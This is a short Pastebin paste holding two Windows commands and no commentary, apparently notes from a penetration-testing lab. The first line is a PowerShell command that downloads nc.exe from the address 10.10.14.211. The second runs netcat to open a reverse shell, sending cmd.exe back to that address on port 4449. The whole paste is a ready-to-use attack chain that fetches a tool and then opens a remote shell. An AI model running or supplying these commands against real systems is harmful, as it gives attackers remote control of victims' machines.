Advertisement
Guest User

Untitled

a guest
Feb 25th, 2018
105
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.14 KB | None | 0 0
  1. powershell -command "(new-object System.Net.Webclient).DownloadFile('http://10.10.14.211/nc.exe', 'nc.exe')"
  2.  
  3. nc.exe 10.10.14.211 4449 -e cmd.exe
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement